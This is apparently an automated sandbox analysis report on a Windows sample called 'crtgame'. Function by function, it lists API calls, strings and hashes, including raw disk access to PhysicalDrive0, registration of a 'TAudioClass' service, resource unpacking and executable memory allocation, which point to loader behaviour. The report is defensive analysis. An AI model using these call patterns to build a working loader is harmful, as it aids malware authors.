                                                                                                            control_flow_graph 89 401a58-401a80 CreateFileA 90 401a86-401a9a 89->90 91 401b4e-401b53 89->91 92 401aa1-401ac9 DeviceIoControl 90->92 93 401acb-401ad3 92->93 94 401afc-401b04 92->94 97 401ad5-401adb 93->97 98 401add-401ae2 93->98 95 401b06-401b0c call 402d16 94->95 96 401b0d-401b10 94->96 95->96 100 401b12-401b15 96->100 101 401b43-401b4d CloseHandle 96->101 97->94 98->94 102 401ae4-401afa call 402d30 call 4018cc 98->102 104 401b30-401b3d call 402d08 100->104 105 401b17-401b20 GetLastError 100->105 101->91 102->94 104->92 104->101 105->101 107 401b22-401b25 105->107 107->104 110 401b27-401b2d 107->110 110->104
                                                                                                            APIs
                                                                                                            • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000,00000000), ref: 00401A74
                                                                                                            • DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401ABB
                                                                                                            • GetLastError.KERNEL32 ref: 00401B17
                                                                                                            • CloseHandle.KERNELBASE(?), ref: 00401B46
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                                                            • String ID: \\.\PhysicalDrive0
                                                                                                            • API String ID: 4026078076-1180397377
                                                                                                            • Opcode ID: 6658c9d09989f05e0195eaddce68eb37b9664083837fa87bf39f3550b185ff27
                                                                                                            • Instruction ID: 0eed0264e883c0688f73d788d7d0bd333b7eda35479a1ece95cf3a9209f64869
                                                                                                            • Opcode Fuzzy Hash: 6658c9d09989f05e0195eaddce68eb37b9664083837fa87bf39f3550b185ff27
                                                                                                            • Instruction Fuzzy Hash: 75315A71D01118AACB21EF96DD849EFBBB9EF40750F20817AE515B22A0E3785E45CF98

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetVersion.KERNEL32 ref: 00402FA8
                                                                                                              • Part of subcall function 004032BA: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402FE1,00000000), ref: 004032CB
                                                                                                              • Part of subcall function 004032BA: HeapDestroy.KERNEL32 ref: 0040330A
                                                                                                            • GetCommandLineA.KERNEL32 ref: 00402FF6
                                                                                                            • GetStartupInfoA.KERNEL32(?), ref: 00403021
                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00403044
                                                                                                              • Part of subcall function 0040309D: ExitProcess.KERNEL32 ref: 004030BA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                                                            • String ID:
                                                                                                            • API String ID: 2057626494-0
                                                                                                            • Opcode ID: fc7c75a0fca1fc71633c191dac2b30b5283b5d3f62fb2d5ff47b98b0991d1776
                                                                                                            • Instruction ID: 9dac6a1a792168accaafc8f216740def6c4fb0c1b32456360c1ba9f1c8530c2f
                                                                                                            • Opcode Fuzzy Hash: fc7c75a0fca1fc71633c191dac2b30b5283b5d3f62fb2d5ff47b98b0991d1776
                                                                                                            • Instruction Fuzzy Hash: D4217CB1800714AADB04AFA6DE09A6E7BA9EB45315F10013EFA05BB2D1DB784810CB99

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 142 401c5b-401c7c GetWindowsDirectoryA 143 401cb7-401cbc 142->143 144 401c7e-401ca0 CreateFileA 142->144 144->143 145 401ca2-401cb1 GetFileTime CloseHandle 144->145 145->143
                                                                                                            APIs
                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00401C74
                                                                                                            • CreateFileA.KERNELBASE(?,00100000,00000007,00000000,00000003,02000000,00000000), ref: 00401C95
                                                                                                            • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00401CA8
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00401CB1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseCreateDirectoryHandleTimeWindows
                                                                                                            • String ID:
                                                                                                            • API String ID: 87451460-0
                                                                                                            • Opcode ID: e2397ba6e5c18c7e638a70f9a661d1ac9407ea32cfd96cdb9d4eb31bc9736a0d
                                                                                                            • Instruction ID: cc4b8a8173e68006100f6bb5cfe5cbca554eec38252bcd741f722b6c7c402e1e
                                                                                                            • Opcode Fuzzy Hash: e2397ba6e5c18c7e638a70f9a661d1ac9407ea32cfd96cdb9d4eb31bc9736a0d
                                                                                                            • Instruction Fuzzy Hash: 7CF0E27668021077E6209B359E8DFCB3AAD9BC6B60F010134BB46F21D0D6B49551C6B4

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 146 4041db-4041e5 147 4041e7-4041f2 GetCurrentProcess TerminateProcess 146->147 148 4041f8-40420e 146->148 147->148 149 404210-404217 148->149 150 40424c-404260 call 404274 148->150 151 404219-404225 149->151 152 40423b-40424b call 404274 149->152 158 404272-404273 150->158 159 404262-40426c ExitProcess 150->159 154 404227-40422b 151->154 155 40423a 151->155 152->150 160 40422d 154->160 161 40422f-404238 154->161 155->152 160->161 161->154 161->155
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(?,?,004041C6,?,00000000,00000000,00403059,00000000,00000000), ref: 004041EB
                                                                                                            • TerminateProcess.KERNEL32(00000000,?,004041C6,?,00000000,00000000,00403059,00000000,00000000), ref: 004041F2
                                                                                                            • ExitProcess.KERNEL32 ref: 0040426C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                            • String ID:
                                                                                                            • API String ID: 1703294689-0
                                                                                                            • Opcode ID: 78841f2a515f296da85e0e90675676ac3a79d5512f1734095c42bbe5f9917e88
                                                                                                            • Instruction ID: 3c2d901587470c3af459565a9284c94394272298cc372ce865a47b82234f48c2
                                                                                                            • Opcode Fuzzy Hash: 78841f2a515f296da85e0e90675676ac3a79d5512f1734095c42bbe5f9917e88
                                                                                                            • Instruction Fuzzy Hash: 7501D2B1648301DEDA10AF65FE44A0A7BB4FBD4391B11457FF241761E0C739A851CA2E

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 163 4032ba-4032d8 HeapCreate 164 403310-403312 163->164 165 4032da-4032e7 call 403172 163->165 168 4032f6-4032f9 165->168 169 4032e9-4032f4 call 403317 165->169 171 403313-403316 168->171 172 4032fb call 403b68 168->172 175 403300-403302 169->175 172->175 175->171 176 403304-40330a HeapDestroy 175->176 176->164
                                                                                                            APIs
                                                                                                            • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402FE1,00000000), ref: 004032CB
                                                                                                              • Part of subcall function 00403172: GetVersionExA.KERNEL32 ref: 00403191
                                                                                                            • HeapDestroy.KERNEL32 ref: 0040330A
                                                                                                              • Part of subcall function 00403317: HeapAlloc.KERNEL32(00000000,00000140,004032F3,000003F8), ref: 00403324
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$AllocCreateDestroyVersion
                                                                                                            • String ID:
                                                                                                            • API String ID: 2507506473-0
                                                                                                            • Opcode ID: 0b849b835aecce10534f7c8868f1023d210904a4762ffb57ab141a925f8bfac6
                                                                                                            • Instruction ID: 02f34df244f728f86bc68da1e651a6997b8534df00875083e7ca9fefff41b132
                                                                                                            • Opcode Fuzzy Hash: 0b849b835aecce10534f7c8868f1023d210904a4762ffb57ab141a925f8bfac6
                                                                                                            • Instruction Fuzzy Hash: C1F06530554301A9EF201F305D8AB2A3DA89794757F14483BF881F91D1EF7D8A91950E

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • RegisterServiceCtrlHandlerA.ADVAPI32(TAudioClass,Function_000023D3), ref: 00402436
                                                                                                            • SetServiceStatus.ADVAPI32(0040A058), ref: 00402495
                                                                                                            • GetLastError.KERNEL32 ref: 00402497
                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004024A4
                                                                                                            • GetLastError.KERNEL32 ref: 004024C5
                                                                                                            • SetServiceStatus.ADVAPI32(0040A058), ref: 004024F5
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00002351,00000000,00000000,00000000), ref: 00402501
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040250A
                                                                                                            • CloseHandle.KERNEL32 ref: 00402516
                                                                                                            • SetServiceStatus.ADVAPI32(0040A058), ref: 0040253F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
                                                                                                            • String ID: TAudioClass
                                                                                                            • API String ID: 3346042915-824782384
                                                                                                            • Opcode ID: cdb2bee97ed7bb97cf955b6f798025c993403a3b9e37aa79489956d55700b49b
                                                                                                            • Instruction ID: 7efe40ee76daeed059ea918d990e5cbaeb6ba916a4eee0f1f7423c99795c6411
                                                                                                            • Opcode Fuzzy Hash: cdb2bee97ed7bb97cf955b6f798025c993403a3b9e37aa79489956d55700b49b
                                                                                                            • Instruction Fuzzy Hash: 1321A9B0841348EBD2119F36FF48E177FA8EB96719715813AE505B22B0C7BA0464DF2E

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 210 4058b7-4058c2 211 4058c4-4058d3 LoadLibraryA 210->211 212 405906-40590d 210->212 213 4058d5-4058ea GetProcAddress 211->213 214 40593c-40593e 211->214 215 405925-405931 212->215 216 40590f-405915 212->216 213->214 217 4058ec-405901 GetProcAddress * 2 213->217 218 405938-40593b 214->218 215->218 216->215 220 405917-40591e 216->220 217->212 220->215 221 405920-405923 220->221 221->215
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00404D7D,?,Microsoft Visual C++ Runtime Library,00012010,?,00406528,?,00406578,?,?,?,Runtime Error!Program: ), ref: 004058C9
                                                                                                            • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004058E1
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004058F2
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 004058FF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                            • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll$xe@
                                                                                                            • API String ID: 2238633743-4073082454
                                                                                                            • Opcode ID: ee458f46fe1812a05d91eb71287a3930c9b5d9979fa11f14182ddc6a57f11331
                                                                                                            • Instruction ID: 2d5919ac961fb8b47e5806104f76029f10fe1308888878a2fdfea3e3d59386dd
                                                                                                            • Opcode Fuzzy Hash: ee458f46fe1812a05d91eb71287a3930c9b5d9979fa11f14182ddc6a57f11331
                                                                                                            • Instruction Fuzzy Hash: 4A017171640701EFC7109FB5AD8091B3BE8EA487A0711043FA105F23E2DA7988619F29

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 223 405b7f-405bad 224 405bf5-405bf8 223->224 225 405baf-405bc9 LCMapStringW 223->225 228 405c0a-405c12 224->228 229 405bfa-405c07 call 405da3 224->229 226 405bd3-405be5 LCMapStringA 225->226 227 405bcb-405bd1 225->227 230 405beb 226->230 231 405d0d 226->231 227->224 233 405c31-405c34 228->233 234 405c14-405c2c LCMapStringA 228->234 229->228 230->224 236 405d0f-405d20 231->236 233->231 237 405c3a-405c3d 233->237 234->236 238 405c47-405c6b MultiByteToWideChar 237->238 239 405c3f-405c44 237->239 238->231 240 405c71-405ca5 call 402db0 238->240 239->238 240->231 244 405ca7-405cbe MultiByteToWideChar 240->244 244->231 245 405cc0-405cd9 LCMapStringW 244->245 245->231 246 405cdb-405cdf 245->246 247 405d21-405d57 call 402db0 246->247 248 405ce1-405ce4 246->248 247->231 255 405d59-405d6f LCMapStringW 247->255 249 405cea-405ced 248->249 250 405d9c-405d9e 248->250 249->231 252 405cef-405d07 LCMapStringW 249->252 250->236 252->231 252->250 255->231 256 405d71-405d76 255->256 257 405d78-405d7a 256->257 258 405d7c-405d7f 256->258 259 405d82-405d96 WideCharToMultiByte 257->259 258->259 259->231 259->250
                                                                                                            APIs
                                                                                                            • LCMapStringW.KERNEL32(00000000,00000100,004065F4,00000001,00000000,00000000,00000103,00000001,00000000,?,00404EF3,00200020,00000000,?,00000000,00000000), ref: 00405BC1
                                                                                                            • LCMapStringA.KERNEL32(00000000,00000100,004065F0,00000001,00000000,00000000,?,00404EF3,00200020,00000000,?,00000000,00000000,00000001), ref: 00405BDD
                                                                                                            • LCMapStringA.KERNEL32(00000000,?,00000000,00200020,00404EF3,?,00000103,00000001,00000000,?,00404EF3,00200020,00000000,?,00000000,00000000), ref: 00405C26
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00404EF3,00200020,00000000,?,00000000,00000000), ref: 00405C5E
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00404EF3,00200020,00000000,?,00000000), ref: 00405CB6
                                                                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00404EF3,00200020,00000000,?,00000000), ref: 00405CCC
                                                                                                            • LCMapStringW.KERNEL32(00000000,?,00404EF3,00000000,00404EF3,?,?,00404EF3,00200020,00000000,?,00000000), ref: 00405CFF
                                                                                                            • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00404EF3,00200020,00000000,?,00000000), ref: 00405D67
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: String$ByteCharMultiWide
                                                                                                            • String ID:
                                                                                                            • API String ID: 352835431-0
                                                                                                            • Opcode ID: 6fb03f0de8e14ffbba6d39a053688989b4d07ae79834ee937682c639a33d809c
                                                                                                            • Instruction ID: b71a23c0b73b48c52d5bda9799daf5958ca8c82b9c5fc6ae779467d82ee1466a
                                                                                                            • Opcode Fuzzy Hash: 6fb03f0de8e14ffbba6d39a053688989b4d07ae79834ee937682c639a33d809c
                                                                                                            • Instruction Fuzzy Hash: 6C514A31900609ABDF229F94DD49E9F7BB9EF48750F10812BF915B12A0D33A8960DF69

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 260 404c59-404c67 261 404c6c-404c6e 260->261 262 404c70-404c79 261->262 263 404c7b-404c87 261->263 262->261 262->263 264 404da9-404dab 263->264 265 404c8d-404c95 263->265 266 404d83-404da3 call 402d30 GetStdHandle WriteFile 265->266 267 404c9b-404c9d 265->267 266->264 268 404cac-404cb2 267->268 269 404c9f-404ca6 267->269 268->264 271 404cb8-404cce GetModuleFileNameA 268->271 269->266 269->268 273 404cd0-404ce2 call 402de0 271->273 274 404ce3-404cfb call 402d30 271->274 273->274 279 404d26-404d81 call 402de0 call 402df0 * 3 call 4058b7 274->279 280 404cfd-404d23 call 402d30 call 405940 274->280 279->264 280->279
                                                                                                            APIs
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00404CC6
                                                                                                            • GetStdHandle.KERNEL32(000000F4,00406528,00000000,?,00000000,00000000), ref: 00404D9C
                                                                                                            • WriteFile.KERNEL32(00000000), ref: 00404DA3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$HandleModuleNameWrite
                                                                                                            • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                            • API String ID: 3784150691-4022980321
                                                                                                            • Opcode ID: 3f183e7b97676ec7bc44c608dee57f0da837cd1f80663b04b7f3573c67123c93
                                                                                                            • Instruction ID: dc6fb59b036afc32ad7d883685c443d86e427d7c65881978fb0b24905fa46ab3
                                                                                                            • Opcode Fuzzy Hash: 3f183e7b97676ec7bc44c608dee57f0da837cd1f80663b04b7f3573c67123c93
                                                                                                            • Instruction Fuzzy Hash: C63192B2A00218AAEF20EA60DD49FDA376DEF85304F1005BBF545B61C1D6B8AE518A19
                                                                                                            APIs
                                                                                                            • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00403006), ref: 0040478B
                                                                                                            • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00403006), ref: 0040479F
                                                                                                            • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00403006), ref: 004047CB
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00403006), ref: 00404803
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00403006), ref: 00404825
                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00403006), ref: 0040483E
                                                                                                            • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00403006), ref: 00404851
                                                                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0040488F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                                            • String ID:
                                                                                                            • API String ID: 1823725401-0
                                                                                                            • Opcode ID: 5b86ae991fad7257a9556b843b73270ba3d506a60895f98d1aae2807b58742cd
                                                                                                            • Instruction ID: b3dd828dc6d9f78d8a5ea985437d6bc406cb02d63f326d11a028c5d351c81a87
                                                                                                            • Opcode Fuzzy Hash: 5b86ae991fad7257a9556b843b73270ba3d506a60895f98d1aae2807b58742cd
                                                                                                            • Instruction Fuzzy Hash: 2E31D0FB5042A56ED7207BB59C8483B769CE6C6358B158D3FF642F3380E6398C4186A9
                                                                                                            APIs
                                                                                                            • FindResourceA.KERNEL32(?,0000000A,00000000), ref: 00402011
                                                                                                            • GetLastError.KERNEL32 ref: 0040201D
                                                                                                            • SizeofResource.KERNEL32(00000000), ref: 0040202A
                                                                                                            • LoadResource.KERNEL32(00000000), ref: 00402044
                                                                                                            • LockResource.KERNEL32(00000000), ref: 0040204B
                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00402056
                                                                                                            • GetTickCount.KERNEL32 ref: 00402092
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 004020F8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                                                            • String ID:
                                                                                                            • API String ID: 564119183-0
                                                                                                            • Opcode ID: f1ea5436b47a97949242679e62fd8c16215760983c098ca12679752f31ddac83
                                                                                                            • Instruction ID: 5bb6e3aa1d8004c7212ec098650266c2412a7dfd0dc2f216cc67e198d7e8a746
                                                                                                            • Opcode Fuzzy Hash: f1ea5436b47a97949242679e62fd8c16215760983c098ca12679752f31ddac83
                                                                                                            • Instruction Fuzzy Hash: 66313B71A003416FDF118BB99E48AAF7F78EF49344B10803AFA46F72C1D6748840C7A8
                                                                                                            APIs
                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,74DF30D0), ref: 004021E3
                                                                                                            • GetLastError.KERNEL32 ref: 00402298
                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000000), ref: 004022A5
                                                                                                            • GetProcAddress.KERNEL32(?,?), ref: 004022E0
                                                                                                            • Sleep.KERNEL32(000003E8), ref: 00402336
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressAllocErrorLastLibraryLoadProcSleepVirtual
                                                                                                            • String ID: (
                                                                                                            • API String ID: 2871813557-3887548279
                                                                                                            • Opcode ID: 7f0dd8bc027646a7730874866425c3d0ac7d12c98f25a8e59b63077f83e1171d
                                                                                                            • Instruction ID: cf3737800172ba696e67f432db29e15671dddcf18138f746b38aebc0affdf460
                                                                                                            • Opcode Fuzzy Hash: 7f0dd8bc027646a7730874866425c3d0ac7d12c98f25a8e59b63077f83e1171d
                                                                                                            • Instruction Fuzzy Hash: AD518371A00215EFDB14CF98C984BAEB7B5FF44304F2480AAE905AB3C1D7B4EA51CB94
                                                                                                            APIs
                                                                                                            • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,00403300), ref: 00403B89
                                                                                                            • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,00403300), ref: 00403BAD
                                                                                                            • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,00403300), ref: 00403BC7
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,00403300), ref: 00403C88
                                                                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,00403300), ref: 00403C9F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual$FreeHeap
                                                                                                            • String ID: @q@$@q@
                                                                                                            • API String ID: 714016831-1591251108
                                                                                                            • Opcode ID: 53fa90f427eeffaf6ecb660fffee8fa42559a5708230ede92574a81e60caacf4
                                                                                                            • Instruction ID: bb2f25b3c446edc19c5578eb3fd2b922e436acdaef88fb0018a24f570b544f83
                                                                                                            • Opcode Fuzzy Hash: 53fa90f427eeffaf6ecb660fffee8fa42559a5708230ede92574a81e60caacf4
                                                                                                            • Instruction Fuzzy Hash: BB3105719447019FE3308F25DD45B26BBE8E748756F10423AE555FB3D0D778A9008B4D
                                                                                                            APIs
                                                                                                            • GetStringTypeW.KERNEL32(00000001,004065F4,00000001,00000000,00000103,00000001,00000000,00404EF3,00200020,00000000,?,00000000,00000000,00000001), ref: 00405E0D
                                                                                                            • GetStringTypeA.KERNEL32(00000000,00000001,004065F0,00000001,?,?,00000000,00000000,00000001), ref: 00405E27
                                                                                                            • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00404EF3,00200020,00000000,?,00000000,00000000,00000001), ref: 00405E5B
                                                                                                            • MultiByteToWideChar.KERNEL32(00404EF3,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00404EF3,00200020,00000000,?,00000000,00000000,00000001), ref: 00405E93
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405EE9
                                                                                                            • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405EFB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: StringType$ByteCharMultiWide
                                                                                                            • String ID:
                                                                                                            • API String ID: 3852931651-0
                                                                                                            • Opcode ID: 842452aa044ae0ef97ac5ad7deab647cbfc0197c5a7373b2729050aa298a8793
                                                                                                            • Instruction ID: 1ddadf124a6ca1b2ca8ea797e0c37c36c04b0ffb7962988f26068f32c671ff11
                                                                                                            • Opcode Fuzzy Hash: 842452aa044ae0ef97ac5ad7deab647cbfc0197c5a7373b2729050aa298a8793
                                                                                                            • Instruction Fuzzy Hash: EC416E7250060AAFCF119F94DD85EAF7B78EB04750F14443AFA12B2290D33989609F99
                                                                                                            APIs
                                                                                                            • GetVersionExA.KERNEL32 ref: 00403191
                                                                                                            • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 004031C6
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403226
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: EnvironmentFileModuleNameVariableVersion
                                                                                                            • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                                                            • API String ID: 1385375860-4131005785
                                                                                                            • Opcode ID: ae729fa98e27c6751e545e4d597dad0f21c0824f8bd7fd76f6a38a193a7a3fad
